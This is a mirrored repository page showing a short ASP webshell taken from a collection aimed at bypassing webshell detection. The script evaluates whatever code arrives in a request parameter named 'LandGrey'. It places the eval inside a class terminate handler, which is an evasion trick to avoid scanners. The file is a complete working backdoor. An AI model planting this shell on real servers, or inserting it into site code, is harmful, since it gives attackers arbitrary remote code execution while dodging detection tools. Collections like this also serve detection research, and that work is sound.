mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
7451dc532b
from: https://github.com/LandGrey/webshell-detect-bypass/tree/master/webshell/asp author: Build By LandGrey
10 lines
No EOL
148 B
Text
10 lines
No EOL
148 B
Text
<%
|
|
Class LandGrey
|
|
Private Sub class_terminate
|
|
eval (request("LandGrey"))
|
|
End Sub
|
|
End Class
|
|
|
|
Set X = New LandGrey
|
|
Set X = Nothing
|
|
%> |